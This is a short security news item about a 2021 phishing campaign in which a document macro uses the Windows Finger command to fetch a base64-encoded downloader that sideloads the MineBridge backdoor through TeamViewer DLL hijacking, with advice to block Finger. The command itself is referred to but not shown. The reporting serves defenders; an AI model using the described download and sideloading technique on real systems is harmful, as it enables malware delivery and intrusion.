Security News > 2021 > January > Windows Finger command abused by phishing to download malware
Attackers are using the normally harmless Windows Finger command to download and install a malicious backdoor on victims' devices.
This week, security researcher Kirk Sayre found a phishing campaign utilizing the Finger command to download the MineBridge backdoor malware.
The deobfuscated command executed by the macro, shown below, uses the finger command to download a Base64 encoded certificate from a remote server and saves it as %AppData%vUCooUr.
The certificate retrieved via the finger command is a base64 encoded malware downloader malware executable.
Once executed, the downloader will download a TeamViewer executable and use DLL hijacking to sideload a malicious DLL, the MineBridge malware.
As Finger is rarely used today, it is suggested that administrators block the Finger command on their network, whether through AppLocker or other methods.
News URL
Related news
- Windows, macOS users targeted with crypto-and-info-stealing malware (source)
- Ongoing Phishing and Malware Campaigns in December 2024 (source)
- New Malware Technique Could Exploit Windows UI Framework to Evade EDR Tools (source)
- FBI wipes Chinese PlugX malware from thousands of Windows PCs in America (source)